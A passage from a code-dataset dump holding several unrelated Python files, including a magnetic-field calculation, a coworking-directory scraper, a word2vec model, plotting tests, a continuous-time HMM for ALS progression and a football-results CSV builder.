len(rm_index)\n","sub_path":"27/27.remove-element.232785867.Accepted.leetcode.py","file_name":"27.remove-element.232785867.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"158640509","text":"import oppumpmagres_funcs as func\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# got this number from Niv's report. Please double check the number\nN_A = 110 # number of turns in Maxwell Coil A\nN_B = 142 # '' B\nN_C = 110 # '' C\n\nx_A = 0.262 # distance to the plane of the coil B [unit: m]\nx_B = 0.0 # ''\nx_C = 0.262 # ''\n\nR_A = 0.591/2.0 # radius of the Maxwell coil A [unit: m]\nR_B = 0.784/2.0 # '' B\nR_C = 0.591/2.0 # '' C\n\nB_per_I_niv = 2.93e-4 #[unit T/A]\nB_per_I = func.BperI_maxwell(N_A, x_A, R_A, N_B, x_B, R_B, N_C, x_C, R_C) \n\nprint(\"B field per unit current according to Niv et al. is %f T/A.\" % (B_per_I_niv))\nprint(\"B field per unit current according to our calc is %f T/A.\" % (B_per_I))\nprint(\"the difference between the two value is %f T/A.\" % (B_per_I - B_per_I_niv))\n\nprint(\"Assume the ambient field of %f T.\" % (func.B_earth))\n\nB_ext_net_vec = np.vectorize(func.B_ext_net)\n\nI = np.arange(0, 1.0e-3, 1.0e-5)\n\nB_ext = B_ext_net_vec(B_per_I, I, func.B_earth)\n\nI = I * 1.0e3 # unit conversion from A to mA\nB_ext = B_ext * 1.0e3 # unit conversion from T to mT\n\nplt.plot(I, B_ext)\nplt.xlabel('Current on Coil [mA]')\nplt.ylabel('Net external field [mT]')\nplt.title('Net external field due to Maxwell Coil and Ambient field')\nplt.show()\n","sub_path":"optical/scripts/maxwell_coil.py","file_name":"maxwell_coil.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"427717735","text":"import requests, re, codecs as co, xlsxwriter as xl\nfrom bs4 import BeautifulSoup\n\nhtml = requests.get('http://coworking-carte.fr/').text\nsp = BeautifulSoup(html, 'html.parser')\nscpt = sp('script')[-4].string.split('\\n')\n\nlist_marker = [co.unicode_escape_decode(re.split(\"[{}]\",x)[1])[0] for x in scpt if 'new google.maps.Marker(' in x]\nlist_data = []\n\nfor m in list_marker:\n data = {}\n splitr = m.split('\"title\":')[1].split(',\"id\":')\n splitr_b = splitr[0][1:-1].split('\\n')\n data['titre'] = splitr_b[0]\n data['adresse'] = splitr_b[1]\n data['tel'] = ''\n data['mail'] = ''\n \n region = splitr[1][1:-1].replace(\"\\/\",\"/\").replace(\" \", \"-\")\n link = 'http://coworking-carte.fr/coworking/' + region\n html_b = requests.get(link).text\n sp_b = BeautifulSoup(html_b, 'html.parser')\n \n tag_ph = sp_b.find(class_=\"phone\")\n if tag_ph.__class__.__name__ != 'NoneType':\n coord = tag_ph.string\n if coord.__class__.__name__ != 'NoneType':\n tab_coord = coord.split(\" - \")\n if len(tab_coord) == 2:\n if '@' in tab_coord[1]:\n data['tel'] = tab_coord[0]\n data['mail'] = tab_coord[1]\n else:\n data['tel'] = tab_coord[1]\n data['mail'] = tab_coord[0]\n elif '@' in coord:\n data['mail'] = coord\n else:\n data['tel'] = coord\n \n list_data.append(data)\n\nwb = xl.Workbook('coworking-carte.xlsx')\nws = wb.add_worksheet()\n\nfor i,k in enumerate(list_data[0].keys()):\n ws.write(0, i, k)\n\nfor i,d in enumerate(list_data):\n for j, v in enumerate(d.values()):\n ws.write(i+1, j, 
v)\n\nwb.close()","sub_path":"recupdata.py","file_name":"recupdata.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"529972620","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport torch as t\nimport torch.nn as nn\n\nfrom torch import LongTensor as LT\nfrom torch import FloatTensor as FT\n\n\nclass Bundler(nn.Module):\n\n def forward(self, data):\n raise NotImplementedError\n\n def forward_i(self, data):\n raise NotImplementedError\n\n def forward_o(self, data):\n raise NotImplementedError\n\n\nclass Word2Vec(Bundler):\n\n def __init__(self, vocab_size=20000, embedding_size=300, padding_idx=0):\n super(Word2Vec, self).__init__()\n self.vocab_size = vocab_size\n self.embedding_size = embedding_size\n self.ivectors = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=padding_idx)\n self.ovectors = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=padding_idx)\n self.ivectors.weight = nn.Parameter(t.cat([t.zeros(1, self.embedding_size), FT(self.vocab_size - 1, self.embedding_size).uniform_(-0.5 / self.embedding_size, 0.5 / self.embedding_size)]))\n self.ovectors.weight = nn.Parameter(t.cat([t.zeros(1, self.embedding_size), FT(self.vocab_size - 1, self.embedding_size).uniform_(-0.5 / self.embedding_size, 0.5 / self.embedding_size)]))\n self.ivectors.weight.requires_grad = True\n self.ovectors.weight.requires_grad = True\n\n def forward(self, data):\n return self.forward_i(data)\n\n def forward_i(self, data):\n v = LT(data)\n v = v.cuda() if self.ivectors.weight.is_cuda else v\n return self.ivectors(v)\n\n def forward_o(self, data):\n v = LT(data)\n v = v.cuda() if self.ovectors.weight.is_cuda else v\n return self.ovectors(v)\n\nclass Word2VecHidden(Bundler):\n\n def __init__(self, vocab_size=20000, embedding_size=300, hidden_size=100, padding_idx=0):\n super(Word2VecHidden, self).__init__()\n self.vocab_size = vocab_size\n self.embedding_size = embedding_size\n self.ivectors = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=padding_idx)\n self.ovectors = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=padding_idx)\n self.ivectors.weight = nn.Parameter(t.cat([t.zeros(1, self.embedding_size), FT(self.vocab_size - 1, self.embedding_size).uniform_(-0.5 / self.embedding_size, 0.5 / self.embedding_size)]))\n self.ovectors.weight = nn.Parameter(t.cat([t.zeros(1, self.embedding_size), FT(self.vocab_size - 1, self.embedding_size).uniform_(-0.5 / self.embedding_size, 0.5 / self.embedding_size)]))\n self.iW = nn.Parameter(FT(hidden_size, embedding_size).uniform_(-0.5, 0.5))\n self.oW = nn.Parameter(FT(hidden_size, embedding_size).uniform_(-0.5, 0.5))\n self.ivectors.weight.requires_grad = True\n self.ovectors.weight.requires_grad = True\n self.sm = t.nn.Softmax(dim=-1)\n\n def forward(self, data):\n return self.forward_i(data)\n\n def forward_i(self, data):\n v = LT(data)\n v = v.cuda() if self.ivectors.weight.is_cuda else v\n return t.matmul(self.sm(self.ivectors(v)), t.transpose(self.iW, 1, 0))\n\n def forward_o(self, data):\n v = LT(data)\n v = v.cuda() if self.ovectors.weight.is_cuda else v\n return t.matmul(self.sm(self.ovectors(v)), t.transpose(self.oW, 1, 0))\n\n\nclass SGNS(nn.Module):\n\n def __init__(self, embedding, vocab_size=20000, n_negs=20, weights=None, tie_weights=False, fake_indices=None):\n super(SGNS, self).__init__()\n self.embedding = embedding\n self.vocab_size = vocab_size\n self.n_negs = n_negs\n self.weights = None\n 
if weights is not None:\n            wf = np.power(weights, 0.75)\n            wf = wf / wf.sum()\n            self.weights = FT(wf)\n        self.tie_weights = tie_weights\n        # Default to None so forward() can safely test self.fake_indices even\n        # when no fake indices (or no weights) were supplied\n        self.fake_indices = None\n        if weights is not None and fake_indices is not None:\n            is_fake = t.zeros(4000).type(t.bool)\n            is_fake[t.LongTensor(list(fake_indices))] = True\n            # adjust weights here and zero them out\n            self.weights_real = self.weights.detach().clone()\n            self.weights_real[is_fake] = 0.0\n            self.weights_fake = self.weights.detach().clone()\n            self.weights_fake[~is_fake] = 0.0\n            self.fake_indices = t.LongTensor(list(fake_indices))\n\n    def forward(self, iword, owords):\n        batch_size = iword.size()[0]\n        context_size = owords.size()[1]\n        if self.fake_indices is None:\n            if self.weights is not None:\n                nwords = t.multinomial(self.weights, batch_size * context_size * self.n_negs, replacement=True).view(batch_size, -1)\n            else:\n                nwords = FT(batch_size, context_size * self.n_negs).uniform_(0, self.vocab_size - 1).long()\n        else:\n            if self.weights is not None:\n                # do broadcasting to check the values\n                is_fake = iword.view(-1, 1).eq(self.fake_indices).sum(1).type(t.bool)\n                n_fake = is_fake.sum()\n                n_real = batch_size - n_fake\n                # two times sampling\n                nwords_fake = t.multinomial(self.weights_fake, n_fake * context_size * self.n_negs, replacement=True).view(n_fake, -1)\n                nwords_real = t.multinomial(self.weights_real, n_real * context_size * self.n_negs, replacement=True).view(n_real, -1)\n                # create empty tensor and use is_fake to assign the sampled words to it\n                nwords = t.zeros(batch_size, context_size * self.n_negs).type(t.long)\n                nwords[is_fake] = nwords_fake\n                nwords[~is_fake] = nwords_real\n            else:\n                raise NotImplementedError()\n        ivectors = self.embedding.forward_i(iword).unsqueeze(2)\n        if self.tie_weights:\n            ovectors = self.embedding.forward_i(owords)\n            nvectors = self.embedding.forward_i(nwords).neg()\n        else:\n            ovectors = self.embedding.forward_o(owords)\n            nvectors = self.embedding.forward_o(nwords).neg()\n        oloss = t.bmm(ovectors, ivectors).squeeze().sigmoid().log().mean(1)\n        nloss = t.bmm(nvectors, ivectors).squeeze().sigmoid().log().view(-1, context_size, self.n_negs).sum(2).mean(1)\n        return -(oloss + nloss).mean()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
{"seq_id":"551632751","text":"\"\"\"Tests use the 'bokeh' backend.\"\"\"\n# pylint: disable=redefined-outer-name,too-many-lines\nfrom pandas import DataFrame\nimport numpy as np\nimport pytest\n\nfrom .helpers import (  # pylint: disable=unused-import\n    eight_schools_params,\n    models,\n    create_model,\n    multidim_models,\n    create_multidimensional_model,\n)\nfrom ..rcparams import rcParams, rc_context\nfrom ..plots import (\n    plot_trace,\n    plot_kde,\n    plot_dist,\n)\n\nrcParams[\"data.load\"] = \"eager\"\n\n\n@pytest.fixture(scope=\"module\")\ndef data(eight_schools_params):\n    data = eight_schools_params\n    return data\n\n\n@pytest.fixture(scope=\"module\")\ndef df_trace():\n    return DataFrame({\"a\": np.random.poisson(2.3, 100)})\n\n\n@pytest.fixture(scope=\"module\")\ndef discrete_model():\n    \"\"\"Simple fixture for random discrete model\"\"\"\n    return {\"x\": np.random.randint(10, size=100), \"y\": np.random.randint(10, size=100)}\n\n\n@pytest.fixture(scope=\"module\")\ndef continuous_model():\n    \"\"\"Simple fixture for random continuous model\"\"\"\n    return {\"x\": np.random.beta(2, 5, size=100), \"y\": np.random.beta(2, 5, size=100)}\n\n\n@pytest.mark.parametrize(\n    \"kwargs\",\n    [\n        {},\n        
{\"var_names\": \"mu\"},\n {\"var_names\": [\"mu\", \"tau\"]},\n {\"combined\": True},\n {\"compact\": True},\n {\"combined\": True, \"compact\": True, \"legend\": True},\n {\"divergences\": \"top\"},\n {\"divergences\": False},\n {\"lines\": [(\"mu\", {}, [1, 2])]},\n {\"lines\": [(\"mu\", {}, 8)]},\n ],\n)\ndef test_plot_trace(models, kwargs):\n axes = plot_trace(models.model_1, backend=\"bokeh\", show=False, **kwargs)\n assert axes.shape\n\n\ndef test_plot_trace_discrete(discrete_model):\n axes = plot_trace(discrete_model, backend=\"bokeh\", show=False)\n assert axes.shape\n\n\ndef test_plot_trace_max_subplots_warning(models):\n with pytest.warns(SyntaxWarning):\n with rc_context(rc={\"plot.max_subplots\": 1}):\n axes = plot_trace(models.model_1, backend=\"bokeh\", show=False)\n assert axes.shape\n\n\ndef test_plot_kde(continuous_model):\n axes = plot_kde(continuous_model[\"y\"], backend=\"bokeh\", show=False)\n assert axes\n\n\n@pytest.mark.parametrize(\n \"kwargs\",\n [\n {\"cumulative\": True},\n {\"cumulative\": True, \"plot_kwargs\": {\"line_dash\": \"dashed\"}},\n {\"rug\": True},\n {\"rug\": True, \"rug_kwargs\": {\"line_alpha\": 0.2}},\n ],\n)\ndef test_plot_kde_cumulative(continuous_model, kwargs):\n axes = plot_kde(continuous_model[\"x\"], backend=\"bokeh\", show=False, **kwargs)\n assert axes\n\n\n@pytest.mark.parametrize(\"kwargs\", [{\"kind\": \"hist\"}, {\"kind\": \"kde\"}])\ndef test_plot_dist(continuous_model, kwargs):\n axes = plot_dist(continuous_model[\"x\"], backend=\"bokeh\", show=False, **kwargs)\n assert axes\n","sub_path":"arviz/tests/test_plots_bokeh.py","file_name":"test_plots_bokeh.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"497733984","text":"import pandas as pd\nimport numpy as np\nimport scipy.linalg as la\nimport matplotlib.pyplot as plt\nimport argparse\nimport pickle\nfrom tqdm import tqdm\nfrom scipy.special import logsumexp\nfrom scipy.stats import multivariate_normal\n\nclass CTHMM:\n def __init__(self, n_states, n_dim):\n self.n_states = n_states\n self.log_pi = np.log(np.ones((self.n_states)) / self.n_states)\n self.log_P = {}\n self.n_pid = 0\n self.log_likelihoods = None\n\n # init R\n self.R = -np.eye(self.n_states)\n self.R[-1, -1] = 0\n for i in range(self.n_states - 1):\n self.R[i,i+1:] = 1 / (self.R[i+1:].shape[0])\n\n self.n_dim = n_dim\n\n # init emission matrix\n self.emission_matrix = np.zeros((2, self.n_states, self.n_dim))\n self.emission_matrix[0, :, :] = 2\n self.emission_matrix[1, :, :] = .5\n self.emission_matrix[0, 0, :] = 4\n self.emission_matrix[0, -1, :] = 0\n\n def EM_step(self, data):\n ### E Step ###\n\n self.n_pid = data['subject_id'].unique().shape[0]\n\n log_pi_update = np.zeros((self.n_states))\n weighted_means = np.log(np.zeros((self.n_states, self.n_dim)))\n\n unique_intervals = data['delta_t'].unique()\n C = np.zeros((unique_intervals.shape[0], self.n_states, self.n_states))\n interval_map = {}\n\n total_weight_assgn = np.log(np.zeros((self.n_states)))\n\n for pid, pdata in tqdm(data.groupby('subject_id')):\n obs = pdata.drop(['subject_id', 'ALSFRS_Delta', 'delta_t', 'ALSFRS_Total'], axis=1).values\n intervals = pdata['delta_t'].values\n\n alpha = self.forward(obs, intervals)\n beta = self.backward(obs, intervals)\n\n LL = logsumexp((alpha[:, -1] + beta[:, -1]))\n\n for idx, t_delta in enumerate(intervals[1:]):\n if t_delta not in interval_map:\n interval_map[t_delta] = len(interval_map.keys())\n log_P = 
self.log_transition_matrix(t_delta)\n log_emission = self.log_emission(obs[idx + 1, :])\n for src in range(self.n_states):\n for dest in range(self.n_states):\n C[interval_map[t_delta], src, dest] = logsumexp([C[interval_map[t_delta], src, dest], alpha[src, idx], log_P[src, dest],\n beta[dest, idx + 1], log_emission[dest]])\n\n log_pi_update = logsumexp([log_pi_update, alpha[:, 0] + beta[:, 0] - LL], axis=0)\n log_weights = np.zeros(alpha.shape)\n for t in range(log_weights.shape[1]):\n log_weights[:,t] = alpha[:,t] + beta[:,t] - logsumexp(alpha[:,t] + beta[:,t]) # M x T\n for i in range(self.n_states):\n for t in range(log_weights.shape[1]):\n for d in range(self.n_dim):\n weighted_means[i, d] = logsumexp([weighted_means[i,d], log_weights[i,t] + np.log(obs[t,d])])\n total_weight_assgn[i] = logsumexp([total_weight_assgn[i], log_weights[i,t]])\n# weighted_means[i, j] = np.e**(alpha + beta - LL) @ obs\n\n\n ### M Step ###\n\n # Update emission params\n self.emission_matrix[0, 1:-1, :] = np.e**(weighted_means - total_weight_assgn[:, None])[1:-1, :]\n\n # Update pi\n self.log_pi = log_pi_update - logsumexp(log_pi_update)\n\n # Updated R\n A = np.zeros((self.n_states * 2, self.n_states * 2))\n A[:self.n_states, :self.n_states] = self.R\n A[self.n_states:, self.n_states:] = self.R\n\n D = np.zeros((self.n_states, self.n_states, self.n_states))\n tau = np.zeros((self.n_states))\n\n N = np.zeros((self.n_states, self.n_states, self.n_states, self.n_states))\n nu = np.zeros((self.n_states, self.n_states))\n\n C = np.e**(C) - 1\n\n for i in range(self.n_states):\n A[i, self.n_states + i] = 1\n for t_delta in unique_intervals:\n if t_delta == 0:\n continue\n D[i] = la.expm(A * t_delta)[:self.n_states, self.n_states:] / \\\n np.e**(self.log_transition_matrix(t_delta))\n D = np.nan_to_num(D)\n tau[i] += np.sum(C[interval_map[t_delta], :, :] * D[i, :, :])\n A[i, self.n_states + i] = 0\n\n for i in range(self.n_states):\n for j in range(self.n_states):\n A[i, self.n_states + j] = 1\n for t_delta in unique_intervals:\n if t_delta == 0:\n continue\n N[i, j] = self.R[i, j] * la.expm(A * t_delta)[:self.n_states, self.n_states:] / \\\n np.e**(self.log_transition_matrix(t_delta))\n N = np.nan_to_num(N)\n nu[i, j] += np.sum(C[interval_map[t_delta], :, :] * N[i, j, :, :])\n A[i, self.n_states + j] = 0\n\n for i in range(self.n_states):\n self.R[i, i+1:] = nu[i, i+1:] / tau[i]\n self.R[i, i] = -np.sum(self.R[i, i+1:])\n\n self.log_P = {}\n\n\n def log_transition_matrix(self, t_delta):\n \"\"\"\n Input:\n t_delta scalar\n Output:\n P M x M\n \"\"\"\n if t_delta in self.log_P:\n return self.log_P[t_delta]\n\n self.log_P[t_delta] = np.log(la.expm(self.R * t_delta))\n\n\n return self.log_P[t_delta]\n\n def log_emission(self, observation):\n \"\"\"\n Input: D x 1\n Output: M x 1\n \"\"\"\n b = np.ndarray(self.n_states, dtype=float)\n for i in range(self.n_states):\n means = self.emission_matrix[0, i]\n covariance = np.diag(self.emission_matrix[1, i])\n b[i] = multivariate_normal.logpdf(observation, means, covariance)\n return b\n\n def forward(self, obs, intervals):\n \"\"\"\n Input:\n obs T x D\n intervals T\n n_states scalar\n Output:\n alpha M x T\n \"\"\"\n T = obs.shape[0]\n alpha = np.zeros((self.n_states, T))\n\n alpha[:, 0] = self.log_pi + self.log_emission(obs[0, :])\n tmp = np.zeros((self.n_states))\n\n for idx, t_delta in enumerate(intervals[1:]):\n log_B = self.log_emission(obs[idx + 1, :])\n log_P = self.log_transition_matrix(t_delta)\n\n for dest in range(self.n_states):\n for src in 
range(self.n_states):\n tmp[src] = alpha[src, idx] + log_P[src, dest]\n\n alpha[dest, idx + 1] = log_B[dest] + logsumexp(tmp)\n\n return alpha\n\n def backward(self, observations, time_intervals):\n T = observations.shape[0]\n beta = np.zeros((self.n_states, T), dtype=float)\n for t in range(T - 2, -1, -1):\n a = self.log_transition_matrix(time_intervals[t])\n b = self.log_emission(observations[t + 1])\n for i in range(self.n_states):\n beta[i, t] = logsumexp([beta[j, t + 1] + a[i, j] + b[j] for j in range(self.n_states)])\n\n return beta\n\n def update_pi(self, alpha, beta):\n self.log_pi = alpha[0, :] + beta[0, :]\n\n def log_likelihood(self, data):\n total = 0\n for pid, pdata in data.groupby('subject_id'):\n obs = pdata.drop(['subject_id', 'ALSFRS_Delta', 'delta_t', 'ALSFRS_Total'], axis=1).values\n intervals = pdata['delta_t'].values\n\n alpha = self.forward(obs, intervals)\n total += logsumexp(alpha[-1])\n\n return total\n\n def save(self, filename):\n pickle.dump(self, open(filename, 'wb'))\n\n @classmethod\n def load(cls, filename):\n return pickle.load(open(filename, 'rb'))\n\ndef train(model, training_data, n_epochs, save_epochs=None, save_filename=None, plot_filename=None):\n should_save = (save_epochs is not None) and (save_filename is not None)\n log_likelihoods = np.ndarray(n_epochs, dtype=float)\n for epoch in tqdm(range(n_epochs)):\n model.EM_step(training_data)\n log_likelihood = model.log_likelihood(training_data)\n log_likelihoods[epoch] = log_likelihood\n\n if should_save and ((epoch + 1) % save_epochs == 0):\n model.save(save_filename)\n\n model.log_likelihoods = log_likelihoods\n if should_save:\n model.save(save_filename)\n\n plt.scatter(range(1,n_epochs+1), log_likelihoods)\n plt.xlabel('epoch')\n plt.ylabel('log likelihood')\n plt.title('model training')\n\n if plot_filename is not None:\n plt.savefig(plot_filename)\n\n plt.show()\n\ndef err(a, b):\n return abs(a.sum() - b.sum()) / b.sum()\n\ndef test(model, test_data):\n results = []\n for pid, pdata in tqdm(test_data.groupby('subject_id')):\n obs = pdata.drop(['subject_id', 'ALSFRS_Delta', 'delta_t', 'ALSFRS_Total'], axis=1).values\n intervals = pdata['delta_t'].values\n\n if pdata.shape[0] == 1 or obs[-1].sum() == 0:\n continue\n\n log_state_dist = model.forward(obs[:-1], intervals[:-1])[:,-1]\n state_dist = np.exp(log_state_dist - logsumexp(log_state_dist))\n\n out_state_dist = state_dist @ la.expm(model.R * intervals[-1])\n\n out_emissions = np.ndarray((out_state_dist.shape[0], obs.shape[1]))\n for i in range(out_state_dist.shape[0]):\n # weighted\n out_emissions[i] = out_state_dist[i] * model.emission_matrix[0,i]\n\n out_obs = np.array([out_emissions[:,i].sum() for i in range(out_emissions.shape[1])])\n\n # out_total = out_obs.sum()\n # final_total = pdata.iloc[-1]['ALSFRS_Total']\n\n mse = err(out_obs, obs[-1])\n results.append((out_obs, obs[-1], mse))\n\n return np.array(results)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-M', '--n_states', type=int, default=5, help=\"number of hidden states\")\n parser.add_argument('-e', '--epochs', type=int, default=10, help=\"number of epochs to train for\")\n parser.add_argument('-s', '--save_filename', type=str, help=\"filename for saving model\")\n parser.add_argument('-l', '--load_filename', type=str, help=\"filename for loading model\")\n parser.add_argument('-t', '--save_epochs', type=int, default=2, help=\"save model every t epochs\")\n parser.add_argument('-p', '--plot_filename', type=str, help=\"filename for saving log likelihood 
plot\")\n parser.add_argument('-n', '--num_pids', type=int, default=None, help=\"number of patients to use\")\n parser.add_argument('-r', '--test', action='store_true', default=False, help=\"test instead of train model\")\n parser.add_argument('data_csv', type=str, help=\"csv with training/test data\")\n args = parser.parse_args()\n\n # load data\n data = pd.read_csv(args.data_csv, index_col=0)\n n_dim = len(data.columns.drop(['subject_id', 'ALSFRS_Delta', 'delta_t', 'ALSFRS_Total']))\n\n if args.num_pids is not None:\n data = data[data['subject_id'].isin(data['subject_id'].unique()[:args.num_pids])]\n\n # load/initiate model\n model = None\n if args.load_filename is not None:\n model = CTHMM.load(args.load_filename)\n if model.n_dim != n_dim:\n print('ERROR: training/test data observations do not have the same dimensions as model')\n exit(1)\n\n if args.test:\n if model is None:\n print('ERROR: no model to test with')\n exit(1)\n\n results = test(model, data)\n errors = results[:,2]\n print('mean test error: {}'.format(errors.mean()))\n return\n\n if model is None:\n model = CTHMM(args.n_states, n_dim)\n\n if args.save_filename is None:\n print('WARNING: the resulting model will not be saved anywhere (provide a save_filename with -s to save the model)')\n\n train(model, data, args.epochs, save_epochs=args.save_epochs, save_filename=args.save_filename, plot_filename=args.plot_filename)\n\nif __name__ == '__main__':\n main()\n","sub_path":"CTHMM_ALS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"71390647","text":"import pandas as pd\r\nimport numpy as np\r\nimport joblib as jl\r\nfrom os import listdir\r\nfrom os.path import join\r\n\r\nOUTPUT = \"../output\"\r\nDATA = \"../output/data\"\r\n\r\n\r\n\r\ndef get_models_from_folder(pca=True):\r\n\t\"\"\"\r\n\treturns list of directories to model files\r\n\t\"\"\"\r\n\r\n\tfolder = 'models_predictions_pca' if pca else 'models_predictions_nopca'\r\n\tmodels = ([join(OUTPUT, folder, m) for m in listdir(join(OUTPUT, folder))\r\n\t\tif 'Model' in m and '0.9' in m])\r\n\r\n\treturn models\r\n\r\n\r\ndef get_test_predictions_files(pca=True):\r\n\t\"\"\"\r\n\treturns list of files that have information on predictions\r\n\tfor test data\t\r\n\t\"\"\"\r\n\r\n\tfolder = 'models_predictions_pca' if pca else 'models_predictions_nopca'\r\n\tpredictions = [join(OUTPUT, folder, p) for p in listdir(join(OUTPUT, folder)) \\\r\n\t\tif 'Predictions' in p and 'Test' in p]\r\n\r\n\treturn predictions\r\n\r\n\r\ndef load_test_data(pca=True):\r\n\t\"\"\"\r\n\treturns df of test features - for pca colnames will be unnamed\r\n\t\"\"\"\r\n\r\n\tflist = [f for f in listdir(DATA) if 'Test' in f]\r\n\tif pca:\r\n\t\tflist = [f for f in flist if 'PCA' in f]\r\n\r\n\r\n\tif len(flist) != 1:\r\n\t\traise Exception(\"File is not uniquely identified\")\r\n\r\n\tfeat_file = flist[0]\r\n\ttest_feats = jl.load(join(DATA, feat_file))\r\n\treturn test_feats\r\n\r\n\r\ndef load_test_target():\r\n\t\"\"\"\r\n\treturns test target\r\n\t\"\"\"\r\n\treturn jl.load(join(DATA, 'Data - Test Target.joblib'))\r\n\r\n\r\n\r\ndef generate_prediction(model, test_feats):\r\n\t\"\"\"\r\n\treturns array of predictions for model on test data\r\n\tinputs\r\n\t\tmodel: string representing a model joblib file\r\n\t\ttest_feats: df of test features\r\n\t\"\"\"\r\n\tprint('predicting for', model)\r\n\tmodel = jl.load(model)\r\n\tpredictions = 
model.predict(test_feats)\r\n\treturn predictions\r\n\r\n\r\ndef generate_all_predictions(model_list, test_feats):\r\n\t"""\r\n\tcalculates predictions for all models in folder\r\n\tinputs:\r\n\t\tmodel_list: list of model paths\r\n\t\ttest_feats: df of test features\r\n\treturns:\r\n\t\tNone - predictions are saved to disk\r\n\t"""\r\n\r\n\tfor m in model_list:\r\n\r\n\t\tpredictions = generate_prediction(m, test_feats)\r\n\t\tpath = get_save_path(m)\r\n\t\tjl.dump(predictions, path)\r\n\r\n\r\ndef execute_all_predictions():\r\n\t"""\r\n\tcalculates predictions for pca and non pca data\r\n\t!!!! not working for non-pca - something about the file path name\r\n\tnot enough time to fix\r\n\t"""\r\n\r\n\tfor pca in (True, False):\r\n\t\ttest_data = load_test_data(pca)\r\n\t\tmodel_list = get_models_from_folder(pca)\r\n\r\n\t\tgenerate_all_predictions(model_list, test_data)\r\n\r\n\tprint('done')\r\n\r\n\r\ndef get_save_path(m):\r\n\t"""\r\n\treturns name for output file as a function of model filename\r\n\t"""\r\n\r\n\tp = m.replace('Model', 'Predictions')\r\n\tp = p[:p.find('0.8')] + 'Test.joblib'\r\n\r\n\treturn p\r\n\r\n\r\ndef calc_MAE(test_target, predictions, var):\r\n\t"""\r\n\treturns mean absolute error for predictions on test_target\r\n\tvar allows for flexibility in target variable\r\n\ttest_target: df with observed values for target var\r\n\t"""\r\n\r\n\tmae = abs(test_target[var] - predictions).mean()\r\n\r\n\treturn mae\r\n\r\n\r\ndef calc_MAE_by_model(prediction_list, test_target, pca=True):\r\n\t"""\r\n\treturns df with columns for model and MAE\r\n\tinputs:\r\n\t\tprediction_list: list of prediction filenames\r\n\t\ttest_target: df with observed values for target var\r\n\t"""\r\n\r\n\tmaes = []\r\n\tvar = 'retail_and_recreation_percent_change_from_baseline'\r\n\r\n\tname_cutoff = 33 if pca else 35\r\n\r\n\tfor p in prediction_list:\r\n\t\tprediction = jl.load(p)\r\n\t\tn = p[name_cutoff:p.find(' - Test')]\r\n\r\n\t\tmae = calc_MAE(test_target, prediction, var)\r\n\t\tmaes.append((n, mae))\r\n\r\n\tdf = pd.DataFrame.from_records(maes)\r\n\tdf.columns = ['Model', 'MAE']\r\n\r\n\treturn df\r\n\r\n\r\ndef execute_MAE_cal():\r\n\t"""\r\n\texecutes process of creating MAEs for all predictions\r\n\treturns df of MAEs per model and saves csv in output folder\r\n\t"""\r\n\r\n\ttest_target = load_test_target()\r\n\tprediction_list = get_test_predictions_files(pca=True)\r\n\trv = calc_MAE_by_model(prediction_list, test_target)\r\n\trv['version'] = rv['Model'].str[-1]\r\n\trv['Model'] = rv['Model'].apply(lambda x: x[:x.find(' - ')])\r\n\r\n\tprint('outputting csv...')\r\n\trv.to_csv(join(OUTPUT, 'test_MAEs.csv'), index=False)\r\n\r\n\treturn rv\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\tprint('whaddup')\r\n\texecute_MAE_cal()\r\n\r\n\r\n\r\n\r\n","sub_path":"scripts/evaluate_models_on_test.py","file_name":"evaluate_models_on_test.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
{"seq_id":"69373209","text":"\"\"\"\nUse the football data API to get past years data\nUsage example:\npython make_results_csv.py --start_year 2018 --output_dir ./airsenal/data/\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nfrom airsenal.framework.data_fetcher import MatchDataFetcher\nfrom airsenal.framework.mappings import alternative_team_names\n\n\n\ndef main(args):\n    start_year = args.start_year\n    start_year_short = start_year[-2:]\n    end_year_short = str(int(start_year_short) + 1)\n    end_year = 
\"20\" + end_year_short\n\n outfilename = os.path.join(args.output_dir,\"results_{}{}_with_gw.csv\".format(\n start_year_short, end_year_short))\n\n outfile = open(outfilename, \"w\")\n outfile.write(\"date,home_team,away_team,home_score,away_score,gameweek\\n\")\n\n home_team = \"\"\n away_team = \"\"\n datestr = \"\"\n\n gameweek = 0\n md = MatchDataFetcher()\n\n for gw in range(1,39):\n results = md.get_results(gw, start_year)\n for result in results:\n date = result[0].split(\"T\")[0]\n home_team = alternative_team_names[result[1]][1]\n away_team = alternative_team_names[result[2]][1]\n home_score = result[3]\n away_score = result[4]\n outfile.write(\"{},{},{},{},{},{}\\n\".format(date,\n home_team,\n away_team,\n home_score,\n away_score,\n gw))\n print(\"{} {} {} {} {} {}\".format(gw, date, home_team, away_team, home_score, away_score))\n outfile.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Create results CSV\")\n parser.add_argument(\"--start_year\",\n help=\"Year that season started\",\n required=True)\n parser.add_argument(\"--output_dir\",\n help=\"output directory for CSV file\",\n required=True)\n args = parser.parse_args()\n 